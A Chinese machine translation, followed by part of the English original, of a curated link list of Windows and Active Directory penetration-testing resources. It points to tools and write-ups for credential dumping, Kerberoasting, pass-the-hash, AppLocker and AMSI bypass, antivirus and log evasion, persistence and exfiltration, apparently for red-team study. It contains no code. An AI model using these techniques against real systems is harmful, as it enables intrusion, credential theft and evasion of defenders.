目录导航
翻译版本
Windows渗透测试资源:
在AD环境中使用LDAP,Kerberos(和MSRPC)的乐趣
https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments
从XML外部实体到NTLM域哈希
From XML External Entity to NTLM Domain Hashes
Windows特权升级指南
https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Windows oneliners下载远程有效负载并执行任意代码
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/amp/
通过本机RDP客户端(mstsc.exe)传递哈希
https://michael-eder.net/post/2018/native_rdp_pass_the_hash/
在Active Directory中使用ACL升级特权
https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/
原子红队自动化框架
https://github.com/redcanaryco/atomic-red-team/blob/master/Automation/readme.md
跳过裂化响应器哈希并中继它们
http://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/amp/?__twitter_impression=true
Exchange-AD-Privesc。Exchange特权升级到Active Directory的存储库
该存储库提供了一些有关Microsoft Exchange部署对Active Directory安全性影响的技术和脚本。
https://github.com/gdedrouas/Exchange-AD-Privesc
WMIC.EXE白名单绕过-破坏样式,样式表
https://subt0x11.blogspot.com.br/2018/04/wmicexe-whitelisting-bypass-hacking.html
隐藏Metasploit Shellcode以逃避Windows Defender
https://blog.rapid7.com/2018/05/03/hiding-metasploit-shellcode-to-evade-windows-defender/
非官方Mimikatz指南和命令参考
Mimikatz
使用Active Directory PowerShell模块收集AD数据
Gathering AD Data with the Active Directory PowerShell Module
在Windows 10上检测虚拟机监控程序的存在
Detecting Hypervisor Presence on Windows 10
域用户枚举工具
https://github.com/sensepost/UserEnum/blob/master/README.md
死亡蓝云:红色团队合作Azure
https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
响动+3恶意软件:几招
http://www.blackstormsecurity.com/docs/BSIDES_2018_RELEASE.pdf
Kerberos派对技巧:武器化Kerberos协议缺陷
http://www.exumbraops.com/blog/2016/6/1/kerberos-party-tricks-weaponizing-kerberos-protocol-flaws
执行命令并使用PowerShell诊断脚本绕过AppLocker
https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts
Windows Vista中引入的Microsoft用户帐户控制功能已引起安全社区中许多人的关注。由于UAC旨在强制用户批准管理行为,因此攻击者(和红色团队)几乎在每次接触时都会遇到UAC。结果,尽管缺乏正式指定作为安全边界,但是绕过此控制是参与者通常必须克服的任务。本演讲重点介绍UAC是什么,其他人之前的工作,研究方法,并详细介绍作者开发的几种技术性UAC绕过技术。
https://youtu.be/c8LgqtATAnE
Windows Userland持久性基础
http://www.fuzzysecurity.com/tutorials/19.html
通过URL文件进行DLL劫持
https://insert-script.blogspot.com.br/2018/05/dll-hijacking-via-url-files.html
通过URL文件进行DLL劫持
https://insert-script.blogspot.com.br/2018/05/dll-hijacking-via-url-files.html
通过GPO枚举远程访问策略
https://labs.mwrinfosecurity.com/blog/enumerating-remote-access-policies-through-gpo/
https://github.com/dafthack/MailSniper
DomainPasswordSpray
DomainPasswordSpray是用PowerShell编写的工具,用于对域用户执行密码喷雾攻击。默认情况下,它将自动从域中生成用户列表。
https://github.com/dafthack/DomainPasswordSpray
查找运行域管理进程的系统的5种方法
5 Ways to Find Systems Running Domain Admin Processes
如何绕过Powershell使用的GPO策略限制
https://github.com/p3nt4/PowerShdll
ADAPE-Active Directory评估和特权升级脚本
https://github.com/hausec/ADAPE-脚本
使用Kerberoasting,利用未打补丁的系统– Red Teamer的一天
http://niiconsulting.com/checkmate/2018/05/kerberoasting-exploiting-unpatched-systems-a-day-in-the-life-of-a-red-teamer/
了解和规避Get-InjectedThread
https://blog.xpnsec.com/undersanding-and-evading-get-injectedthread/
PowerLessShell依靠MSBuild.exe远程执行PowerShell脚本和命令,而不会生成powershell.exe。您也可以使用相同的方法执行原始Shellcode。
https://github.com/Mr-Un1k0d3r/PowerLessShell
转储明文凭证
Dumping Clear-Text Credentials
Office365 ActiveSync用户名枚举
https://www.sec-1.com/blog/2017/office365-activesync-username-enumeration
他的脚本将尝试为具有该属性的用户列出并获取TGT
设置了“不需要Kerberos预身份验证”(UF_DONT_REQUIRE_PREAUTH)。
对于具有这种配置的用户,将生成John The Ripper输出,因此
您可以发送它进行破解。
https://github.com/CoreSecurity/impacket/commit/bada8a719f8ed7be4633514eea94bc768dbaf019
NBNS欺骗
NBNS Spoofing
NTLMv1多功能工具
此工具会修改NTLMv1 / NTLMv1-ESS / MSCHAPv2哈希,以便可以使用哈希猫中的DES模式14000对其进行破解
https://github.com/evilmog/ntlmv1-multi/
Invoke-Phant0分钟
该脚本遍历事件日志服务进程(专用svchost.exe)的线程堆栈,并标识事件日志线程以杀死事件日志服务线程。因此,系统将无法收集日志,同时事件日志服务似乎正在运行。
https://artofpwn.com/phant0m-killing-windows-event-log.html
https://github.com/hlldz/Invoke-Phant0m
使用PowerUpSQL转储Active Directory域信息!
Dumping Active Directory Domain Info – with PowerUpSQL!
绕过PowerShell执行策略的15种方法
15 Ways to Bypass the PowerShell Execution Policy
提升,UAC绕过,持久性,特权升级,dll劫持技术
https://github.com/rootm0s/WinPwnage
滥用DCOM进行另一种横向移动技术
Abusing DCOM For Yet Another Lateral Movement Technique
调用WMILM
这是PoC脚本,用于通过WMI来实现经过身份验证的远程代码执行的各种方法,而无需(至少直接使用)Win32_Process类。技术的类型由“类型”(Type)参数确定。
https://github.com/Cybereason/Invoke-WMILM/blob/master/README.md
[内核开发] 7:任意覆盖(Win7 x86)
https://www.abatchy.com/2018/01/kernel-exploitation-7
Active Directory作为C2(命令和控制)
https://akijosberryblog.wordpress.com/2018/03/17/active-directory-as-a-c2-command-control
.NET程序集编译方法绕过Device Guard
http://www.exploit-monday.com/2017/07/bypassing-device-guard-with-dotnet-methods.html
DiskShadow:VSS规避,持久性和Active Directory数据库提取的返回
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
使用RDP进行网络隔离
https://rastamouse.me/2017/08/jumping-network-segregation-with-rdp/
Win 10(v1803)上的PowerShell Shellcode注入
https://blog.cobaltstrike.com/2018/05/24/powershell-shellcode-injection-on-win-10-v1803/
推出了Empire Web v2,这是Powershell帝国的Web界面。
https://github.com/interference-security/empire-web
隐藏的管理帐户:抢救的猎犬
https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
使用Kerberoasting提取服务帐户密码
https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/
MSDAT(Microsoft SQL数据库攻击工具)是一种开源渗透测试工具,可以远程测试Microsoft SQL数据库的安全性。
https://github.com/quentinhardy/msdat
强力猫
Netcat:Powershell版本。
https://github.com/besimorhino/powercat
渗透测试人员的Windows特权升级方法
Windows Privilege Escalation Methods for Pentesters
使用Kerberos无约束委派获取域管理员
http://www.labofapenetrationtester.com/2016/02/getting-domain-admin-with-kerberos-unconstrained-delegation.html
扫描Active Directory特权和特权帐户
Scanning for Active Directory Privileges & Privileged Accounts
使用Invoke-ADLabDeployer进行自动化的AD和Windows测试实验室部署
Automated AD and Windows test lab deployments with Invoke-ADLabDeployer
简化密码喷涂
https://www.trustwave.com/Resources/SpiderLabs-Blog/Simplifying-Password-Spraying/
Active Directory凭据的密码喷涂工具
https://github.com/SpiderLabs/Spray
滥用SeLoadDriverPrivilege进行特权升级
https://www.tarlogic.com/cn/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
探索PowerShell AMSI和记录逃避
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
进行代码执行的Weaponizing .SettingContent-ms扩展
https://www.trustedsec.com/2018/06/weaponizing-settingcontent
WMImplant开发后-简介
https://www.fortynorthsecurity.com/wmimplant-post-exploitation-an-introduction
WMImplant开发后-简介
https://www.fortynorthsecurity.com/wmimplant-post-exploitation-an-introduction
PowerShell:如何获取远程计算机上所有已安装软件的列表
https://sid-500.com/2018/04/02/powershell-how-to-get-a-list-of-all-installed-software-on-remote-computers
Tokenvator:使用Windows令牌提升特权的工具
Tokenvator: A Tool to Elevate Privilege using Windows Tokens
使用一个简单的技巧在JScript中禁用AMSI
https://tyranidslair.blogspot.com/2018/06/disabling-amsi-in-jscript-with-one.html
Inveigh是PowerShell LLMNR / mDNS / NBNS欺骗者和中间人工具,旨在帮助发现自己仅限于Windows系统的渗透测试人员/红色团队合作者。
https://github.com/Kevin-Robertson/Inveigh/blob/master/README.md
一种多线程工具,旨在通过SMB大规模地识别凭证在网络中是有效,无效还是本地管理员有效凭证,现在还可以与用户猎人一起使用
https://github.com/Raikia/CredNinja
PSScriptAnalyzer是Windows PowerShell模块和脚本的静态代码检查器。PSScriptAnalyzer通过运行一组规则来检查Windows PowerShell代码的质量。规则基于PowerShell团队和社区确定的PowerShell最佳做法。它生成DiagnosticResults(错误和警告),以告知用户潜在的代码缺陷,并提出可能的改进方案。
https://github.com/PowerShell/PSScriptAnalyzer
绕过SQL Server登录触发器限制
Bypassing SQL Server Logon Trigger Restrictions
欺骗性SSDP会针对网络上的NTLM哈希回复网络钓鱼。创建一个伪造的UPNP设备,诱使用户访问恶意网页仿冒页面。
https://gitlab.com/initstring/evil-ssdp
https://twitter.com/subTee/status/1012657434702123008?s=19
丧失能力的Windows Defender
Incapacitating Windows Defender
红队故事0x01:从MSSQL到RCE
https://www.tarlogic.com/cn/blog/red-team-tales-0x01
LethalHTA-使用DCOM和HTA的新横向移动技术
https://codewhitesec.blogspot.com/2018/07/lethalhta.html
是什么使Microsoft可执行文件成为Microsoft可执行文件?攻击者和防御者的观点
https://posts.specterops.io/what-is-it-that-makes-a-microsoft-executable-a-microsoft-executable-b43ac612195e
Powershell脚本,用于枚举启用了自动提升的可执行文件,方便进行特权升级。
https://gist.github.com/Evilcry/71e03a969689b8fd1297a1803aa4d7cf
使用SCF文件收集哈希
Using a SCF file to Gather Hashes
攻击域信任的指南
A Guide to Attacking Domain Trusts
RE:在Windows 10上规避自动运行PoC
https://medium.com/@KyleHanslovan/re-evading-autoruns-pocs-on-windows-10-dd810d7e8a3f
功能,而不是错误:DNSAdmin可以DC折衷
https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
超越LLMNR / NBNS欺骗–利用Active Directory集成的DNS
Beyond LLMNR/NBNS Spoofing – Exploiting Active Directory-Integrated DNS
https://github.com/Kevin-Robertson/Powermad/blob/master/README.md
域NC磁头上具有写访问权限的域访问
Elevating AD Domain Access With Write Access on the Domain NC Head
使用Mimikatz DCSync提取用户密码数据
https://blog.stealthbits.com/extracting-user-password-data-with-mimikatz-dcsync/
将哈希传递给NTLM身份验证的Web应用程序
https://labs.mwrinfosecurity.com/blog/pth-attacks-against-ntlm-authenticated-web-applications/
winrm.vbs中的应用程序白名单绕过和任意无符号代码执行技术
https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404
面纱有效载荷和面纱军械
https://www.fortynorthsecurity.com/veil-payloads-and-veil-ordnance/
清除Linux / Windows服务器中的所有日志
https://github.com/Rizer0/Log-killer
如果可以的话,请捕获我:用Cobalt Strike和石像鬼绕过内存扫描仪
https://labs.mwrinfosecurity.com/blog/experimenting-bypassing-memory-scanners-with-cobalt-strike-and-gargoyle
用于检查Windows二进制文件(EXE / DLL)是否已通过ASLR,DEP,SafeSEH,StrongNaming和Authenticode编译的PowerShell模块。
https://github.com/NetSPI/PESecurity
利用Windows 10 PagedPool一次性关闭溢出(WCTF 2018)
https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/
匿名枚举Azure文件资源
Anonymously Enumerating Azure File Resources
通过将SettingContent-ms嵌入PDF来武器化PDF。
https://github.com/DidierStevens/DidierStevensSuite/blob/master/make-pdf-embedded.py
在图像文件执行选项中使用GlobalFlags的持久性–从Autoruns.exe隐藏
https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe
破坏Azure Windows 2008 R2 SP1 VM
https://guptaashish.com/2018/07/04/compromising-a-azure-windows-2008-r2-sp1-vm
Microsoft LAPS安全性和Active Directory LAPS配置侦听
Microsoft LAPS Security & Active Directory LAPS Configuration Recon
PowerShell绝对是C#的“网关药物”-GhostPack是新安全工具(当前为C#)的集合,摆脱了Powershell监控的关注
https://github.com/GhostPack
通过Kerberos传递哈希
https://malicious.link/post/2018/pass-the-hash-with-kerberos/
幽灵包
https://posts.specterops.io/ghostpack-d835018c5fc4
域名善良–我如何学习爱AD Explorer
Domain Goodness – How I Learned to LOVE AD Explorer
进入系统外壳的另一种方法-辅助技术
Another way to get to a system shell – Assistive Technology
Robber:一种开放源代码工具,用于查找易于发生DLL劫持的可执行文件
https://github.com/MojtabaTajik/Robber
safetyKatz:@gentilkiwi的Mimikatz项目和@subtee的.NET PE Loader的略微修改版本的组合。
https://github.com/GhostPack/SafetyKatz
在公司网络中安装Windows后,到处都可以找到存储的密码
http://blog.win-fu.com/2017/08/stored-passwords-found-all-over-place.html
安全性乐趣:猎犬,MS16-072和GPO可发现性
Security Fun: Bloodhound, MS16-072 and GPO Discoverability
Netsh DLL帮助器
http://liberty-shell.com/sec/2018/07/28/netshlep/
使用WMIC(系统命令)进行后期开发
Post Exploitation Using WMIC (System Command)
2018年更新的PoC Mimikatz装载机
PoC:https://gist.github.com/caseysmithrc/87f6572547f633f13a8482a0c91fb7b7
一线式:https://gist.github.com/xillwillx/96e2c5011577d8583635ad7bf6d4fb58
Windows特权升级注意事项
http://memorycorruption.org/windows/2018/07/29/Notes-On-Windows-Privilege-Escalation.html
域渗透测试:使用BloodHound,Crackmapexec和Mimikatz获取域管理员
https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin
最终的AppLocker绕过列表:此存储库的目的是记录绕过AppLocker的最常用技术。
https://github.com/api0cradle/UltimateAppLockerByPassList/tree/Dev
LDAP注入备忘单,攻击示例和防护
https://www.checkmarx.com/knowledge/knowledgebase/LDAP
允许暂停\取消暂停Win32 / 64 exe的PowerShell脚本
https://github.com/besimorhino/Pause-Process
ASP.NET资源文件(.RESX)和反序列化问题
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/august/aspnet-resource-files-resx-and-deserialisation-issues/
利用IIS / .NET中的XXE漏洞
https://pen-testing.sans.org/blog/2017/12/08/entity-inception-exploiting-iis-net-with-xxe-vulnerabilities
当“ ASLR”不是真正的ASLR时-错误假设和错误默认值的情况
https://insights.sei.cmu.edu/cert/2018/08/when-aslr-is-not-really-aslr---the-case-of-incorrect-assumptions-and-bad-defaults.html
使用Office [DOT] XML文档捕获NetNTLM哈希
https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents
外壳混淆
pOWershell obFUsCation
通过WMI和PowerShell复制文件
https://www.fortynorthsecurity.com/copying-files-via-wmi-and-powershell
通过Meterpreter使用WinRM
https://www.trustedsec.com/2017/09/using-winrm-meterpreter
TBAL:本地用户的(偶然的?)DPAPI后门
TBAL: an (accidental?) DPAPI Backdoor for local users
PoC:
https://youtu.be/NIPKMSV-KTw
P0wnedShell:
PowerShell Runspace发布后利用工具包
https://github.com/Cn33liz/p0wnedShell
mimiDbg:
PowerShell oneliner从内存中检索最糟糕的密码
https://github.com/giMini/mimiDbg
针对AD集成的SSO提供者的金票攻击执行
https://www.fractalindustries.com/newsroom/blog/gt-attacks-and-sso
Windows特权升级基础
http://www.fuzzysecurity.com/tutorials/16.html
使用一个简单的技巧在JScript中禁用AMSI
https://tyranidslair.blogspot.com/2018/06/disabling-amsi-in-jscript-with-one.html
不可阻挡的服务:
一种在C#中具有不可停止属性的C#自安装Windows服务的模式。
https://github.com/malcomvetter/UnstoppableService
驱动程序加载器,用于绕过Windows x64驱动程序签名实施
https://github.com/hfiref0x/TDL
颠覆Sysmon:
形式化安全产品规避方法的应用
码:
https://github.com/mattifestation/BHUSA2018_Sysmon/tree/master/Code
幻灯片:
https://github.com/mattifestation/BHUSA2018_Sysmon/blob/master/Slides_Subverting_Sysmon.pdf
白皮书:
https://github.com/mattifestation/BHUSA2018_Sysmon/blob/master/Whitepaper_Subverting_Sysmon.pdf
PSExec在C#中的实现
https://github.com/malcomvetter/CSExec
SMBetray:后门和破坏性签名
https://quickbreach.io/2018/08/12/smbetray-backdooring-and-breaking-signatures
https://github.com/QuickBreach/SMBetray.git
ADRecon:Active Directory Recon Blackhat Arsenal 2018
https://www.slideshare.net/mobile/prashant3535/adrecon-bh-usa-2018-arsenal-and-def-con-26-demo-labs-presentation
https://github.com/sense-of-security/adrecon
PS1jacker:
用于生成COM劫持有效负载的工具。
https://github.com/darkw1z/Ps1jacker
DEF CON 26(2018)–利用Active Directory管理员的不安全因素
https://adsecurity.org/wp-content/uploads/2018/08/2018-DEFCON-ExploitingADAdministratorInsecurities-Metcalf.pdf
从工作站到域管理员:为什么安全管理不安全以及如何解决
https://adsecurity.org/wp-content/uploads/2018/08/us-18-Metcalf-From-Workstation-To-Domain-Admin-Why-Secure-Administration-Isnt-Secure-Final.pdf
用于检测Windows Defender的mpengine.dll的工具
https://github.com/0xAlexei/WindowsDefenderTools
反检测的艺术1 – AV和检测技术简介
Art of Anti Detection 1 – Introduction to AV & Detection Techniques
Ridrelay:通过使用具有低priv的SMB中继来枚举您没有信誉的域上的用户名。
https://github.com/skorov/ridrelay
远程枚举防病毒配置
https://www.fortynorthsecurity.com/remotely-enumerate-anti-virus-configurations
多汁的土豆(滥用黄金特权)
https://decoder.cloud/2018/08/10/juicy-potato
多汁的土豆(滥用黄金特权)
https://ohpe.github.io/juicy-potato
黑客攻击HTA文件
http://blog.sevagas.com/?Hacking-around-HTA-files
Koadic C3 COM命令和控制-JScript RAT
https://github.com/zerosum0x0/koadic
网络钓鱼-询问并获得
https://blog.fox-it.com/2018/08/14/phishing-ask-and-ye-shall-receive
Windows开发技巧:利用任意对象目录创建本地特权提升
https://googleprojectzero.blogspot.com/2018/08/windows-exploitation-tricks-exploiting.html
绕过Microsoft AD FS多重身份验证协议(CVE-2018-8340):
多因素混合:谁又是你?
https://www.okta.com/security-blog/2018/08/multi-factor-authentication-microsoft-adfs-vulnerability
协调器:C#目标攻击一致性工具
https://github.com/stufus/reconerator
DCShadow-最小权限,Active Directory欺骗,Shadowception等
http://www.labofapenetrationtester.com/2018/04/dcshadow.html
万能钥匙攻击
https://pentestlab.blog/2018/04/10/skeleton-key
Microsoft.Workflow.Compiler.exe中的任意无符号代码执行向量
https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
SANS网络广播:用于PenTesting的PowerShell
https://www.youtube.com/watch?v=a8_DqEVFwO8
Microsoft.Workflow.Compiler.exe Mimikatz运行程序。
https://gist.github.com/caseysmithrc/b1190e023cd29c1910c01a164675a22e
列表-RDP-连接历史
使用powershell列出已登录用户或所有用户的RDP连接历史记录
https://github.com/3gstudent/List-RDP-Connections-History
通用Windows Bootkit
对MBR引导程序(称为“ HDRoot”)的分析
http://williamshowalter.com/a-universal-windows-bootkit
广播名称解析中毒/ WPAD攻击向量
https://p16.praetorian.com/blog/broadcast-name-resolution-poisoning-wpad-attack-vector
.NET反序列化为NTLM哈希
https://www.digitalinterruption.com/single-post/2018/04/22/NET-Deserialization-to-NTLM-hashhes
使用Python工具将虚假更新注入未加密的WSUS流量
https://github.com/pdjstone/wsuspect-proxy
远程修改防病毒配置
https://www.fortynorthsecurity.com/remotely-modify-anti-virus-configurations
制作完美的注射器:滥用Windows地址清理和CoW
Making the Perfect Injector: Abusing Windows Address Sanitization and CoW
通过.URL或desktop.ini文件泄漏Windows资源管理器中的环境变量
https://insert-script.blogspot.com/2018/08/leaking-environment-variables-in_20.html
从Windows 10 ssh-agent提取SSH私钥
https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent
午餐前我在内部网络上获得域管理员的五种方式(2018年版)
https://medium.com/@adam.toscher/top-five-way-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
CVE-2018-0952:Windows Standard Collector服务中的特权升级漏洞
https://www.atredis.com/blog/cve-2018-0952-privilege-escalation-vulnerability-in-windows-standard-collector-service
攻击性用户DPAPI滥用的操作指南
https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107
Kerberoasting和SharpRoast输出解析!
https://grumpy-sec.blogspot.com/2018/08/kerberoasting-and-sharproast-output.html
whitelist_bypass_server
通过提供对诸如软件限制策略和applocker之类的解决方案的绕过,该模块旨在成为测试端点应用程序白名单有效性的平台。
https://github.com/rapid7/metasploit-framework/pull/8783
客户端开发-交易技巧0x01-Sharpshooter + SquibblyTwo
https://0x00sec.org/t/clientside-exploitation-tricks-of-the-trade-0x01-sharpshooter-squibblytwo/8178
权限提升和开发后文件
https://rmusser.net/docs/权限升级和Post-Exploitation.html
任务计划程序ALPC漏洞利用(未修补)和&PoC by SandboxEscaper
https://github.com/SandboxEscaper/randomrepo/blob/master/PoC-LPE.rar
通过Windows端口445上的meterpreter进行远程NTLM中继
https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445
Microsoft.Workflow.Compiler.exe,Veil和Cobalt Strike
https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike
绕过工作流保护机制-SharePoint上的远程执行代码
https://www.nccgroup.trust/uk/our-research/technical-advisory-bypassing-workflows-protection-mechanisms-remote-code-execution-on-sharepoint
在Microsoft Word中玩ActiveX控件
https://www.blackhillsinfosec.com/having-fun-with-activex-controls-in-microsoft-word
Invoke-AtomicTest-与Atomic Red Team自动化MITER ATT&CK
http://subt0x11.blogspot.com/2018/08/invoke-atomictest-automating-mitre-att.html
AppLocker绕过-CMSTP
https://pentestlab.blog/2018/05/10/applocker-bypass-cmstp
使用AdminSDHolder和SDProp的持久性
https://blog.stealthbits.com/persistence-using-adminsdholder-and-sdprop
Red Teaming Microsoft:第1部分–通过Azure进行Active Directory泄漏
https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure
演练Mimikatz sekurlsa模块
https://jetsecurity.github.io/post/mimikatz/walk-through_sekurlsa
Windows-privesc-check-独立的可执行文件,用于检查Windows系统上的简单权限提升向量
https://github.com/pentestmonkey/windows-privesc-check
了解DLL劫持的工作方式
https://astr0baby.wordpress.com/2018/09/08/understanding-how-dll-hijacking-works
玩中继凭证
https://www.coresecurity.com/blog/playing-relayed-credentials
DDE下载器,Excel滥用和PowerShell后门
http://rinseandrepeatanalysis.blogspot.com/2018/09/dde-downloaders-excel-abuse-and.html
CVE-2018-8120的详细技术说明
https://xiaodaozhi.com/exploit/156.html
Windows零日特权esc的PowerShell示例
https://github.com/OneLogicalMyth/zeroday-powershell/blob/master/README.md
你不能遏制我!::分析和利用Docker for Windows中的特权提升漏洞
https://srcincite.io/blog/2018/08/31/you-cant-contain-me-analyzing-and-exploiting-an-elevation-of-privilege-in-docker-for-windows.html
CVE-2018-8420-通过Web浏览器PoC的Microsoft XML核心服务MSXML RCE
https://github.com/Theropord/CVE-2018-8420
绕过AppLocker自定义规则
https://0x09al.github.io/security/applocker/bypass/custom/rules/windows/2018/09/13/applocker-custom-rules-bypass.html
0x09AL安全博客
绕过AppLocker自定义规则
介绍
乔纳森(Jonhnathan)乔纳森(Jonhnathan)
w0rk3r的Windows黑客库
使用SeCreateTokenPrivilege利用STOPzilla AntiMalware任意写入漏洞
Exploiting STOPzilla AntiMalware Arbitrary Write Vulnerability using SeCreateTokenPrivilege
乔纳森(Jonhnathan)乔纳森(Jonhnathan)
w0rk3r的Windows黑客库
如何在Mimikatz中添加模块?
https://littlesecurityprince.com/security/2018/03/18/ModuleMimikatz.html
使用Metasploit绕过UAC的多种方法
Multiple Ways to Bypass UAC using Metasploit
乔纳森(Jonhnathan)乔纳森(Jonhnathan)
w0rk3r的Windows黑客库
从OSINT到内部:从外围获得域管理员
https://www.coalfire.com/The-Coalfire-Blog/Sept-2018/From-OSINT-to-Internal-Gaining-Domain-Admin
从JSP Shell使用Mimikatz
https://blog.securitycompass.com/whiteboard-wednesday-using-mimikatz-from-a-jsp-shell-54f8a21693cc
随身携带2个lsass保护选项
https://medium.com/red-teaming-with-a-blue-team-mentaility/poking-around-with-2-lsass-protection-options-880590a72b1a
SharpSploit简介:AC#开发后库
https://posts.specterops.io/introducing-sharpsploit-ac-post-exploitation-library-5c7be5f16c51
使用LDAP加快域升级
Faster Domain Escalation using LDAP
.NET Framework版本中的一课
https://rastamouse.me/2018/09/a-lesson-in-.net-framework-versions
使用Active Directory进行命令和控制
Command and Control Using Active Directory
L1TF(Foreshadow)VM来宾到主机的内存读取PoC
https://github.com/gregvish/l1tf-poc
MS Outlook中的SMB哈希劫持和用户跟踪
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/smb-hash-hijacking-and-user-tracking-in-ms-outlook
SharpBox是C#工具,用于使用DropBox API将数据压缩,加密和渗漏到DropBox中
https://github.com/P1CKLES/SharpBox
从Kekeo到Rubeus
https://posts.specterops.io/from-kekeo-to-rubeus-86d2ec501c14
Tokenvator:版本2
Tokenvator: Release 2
通过COM的AppLocker CLM旁路
https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com
Injdrv是概念验证的Windows驱动程序,用于使用APC将DLL注入用户模式进程
https://github.com/wbenny/injdrv
响应者和第2层枢轴
https://ijustwannared.team/2017/05/27/responder-and-layer-2-pivots
PowerShell:通过在所有域计算机上运行systeminfo记录环境
https://sid-500.com/2017/08/09/powershell-documenting-your-environment-by-running-systeminfo-on-all-domain-computers
备用操作员的力量
https://decoder.cloud/2018/02/12/the-power-of-backup-operatos
滥用Windows库文件以实现持久性
https://www.countercept.com/blog/abusing-windows-library-files-for-persistence
域控制打印服务器+不受约束的Kerberos委派=拥有的Active Directory林
Domain Controller Print Server + Unconstrained Kerberos Delegation = Pwned Active Directory Forest
Powershell的invoke-Confusion .NET远程攻击者
https://homjxi0e.wordpress.com/2018/10/02/invoke-confusion-attack-of-powershell
使用DCShadow创建持久性
https://blog.stealthbits.com/creating-persistence-with-dcshadow
时间旅行调试:发现Windows GDI缺陷
Time Travel Debugging: finding Windows GDI flaws
恶意使用Microsoft“本地管理员密码解决方案”
http://archive.hack.lu/2017/HackLU_2017_Malicious_use_LAPS_Clementz_Goichot.pdf
Tokenvator Wiki
https://github.com/0xbadjuju/Tokenvator/wiki
ServiceFu:远程收集服务帐户凭据
https://www.securifera.com/blog/2018/10/07/servicefu
对Sysmon进攻
https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon
利用Regedit:看不见的持久性和二进制存储
https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf
PoC:
https://github.com/ewhitehats/InvisiblePersistence/tree/master/InvisibleKeys
使用PowerShell攻击Azure环境
https://youtu.be/IdORwgxDpkw
MicroBurst:一组用于评估Microsoft Azure安全性的脚本
https://github.com/NetSPI/MicroBurst
Icebreaker.py:通过一个命令在Active Directory中立足
SaintCon的Dan McInerney
https://youtu.be/1LR5u8uKO8I
[工具]破冰船:
如果您位于内部网络上但不在AD环境中,则获取纯文本Active Directory凭据
https://github.com/DanMcInerney/icebreaker
利用WSUS –第一部分
https://ijustwannared.team/2018/10/15/leveraging-wsus-part-one
使用Invoke-PowerCloud通过DNS进行Powershell有效负载交付
https://how.ired.team/offensive-security-experiments/payload-delivery-via-dns-using-invoke-powercloud
SharpAttack:用于执行某些安全评估任务的控制台。它利用.NET和Windows API来执行其工作(和cobbr_io SharpSploit)。它包含用于域枚举,代码执行和其他有趣功能的命令。
https://github.com/jaredhaight/SharpAttack
在陆地上生活
https://liberty-shell.com/sec/2018/10/20/living-off-the-land
原文
Windows Pentesting Resources :
Fun with LDAP, Kerberos (and MSRPC) in AD Environments
https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments
From XML External Entity to NTLM Domain Hashes
From XML External Entity to NTLM Domain Hashes
Windows Privilege Escalation Guide
https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Windows oneliners to download remote payload and execute arbitrary code
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/amp/
Passing the hash with native RDP client (mstsc.exe)
https://michael-eder.net/post/2018/native_rdp_pass_the_hash/
Escalating privileges with ACLs in Active Directory
https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/
Automation Framework for the Atomic Red Team
https://github.com/redcanaryco/atomic-red-team/blob/master/Automation/readme.md
Skip Cracking Responder Hashes and Relay Them
http://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/amp/?__twitter_impression=true
Exchange-AD-Privesc. Repository of Exchange privilege escalations to Active Directory
This repository provides a few techniques and scripts regarding the impact of Microsoft Exchange deployment on Active Directory security.
https://github.com/gdedrouas/Exchange-AD-Privesc
WMIC.EXE Whitelisting Bypass - Hacking with Style, Stylesheets
https://subt0x11.blogspot.com.br/2018/04/wmicexe-whitelisting-bypass-hacking.html
Hiding Metasploit Shellcode to Evade Windows Defender
https://blog.rapid7.com/2018/05/03/hiding-metasploit-shellcode-to-evade-windows-defender/
Unofficial Guide to Mimikatz & Command Reference
Mimikatz
Gathering AD Data with the Active Directory PowerShell Module
Gathering AD Data with the Active Directory PowerShell Module
Detecting hypervisor presence on windows 10
Detecting Hypervisor Presence on Windows 10
Domain user Enumeration Tool
https://github.com/sensepost/UserEnum/blob/master/README.md
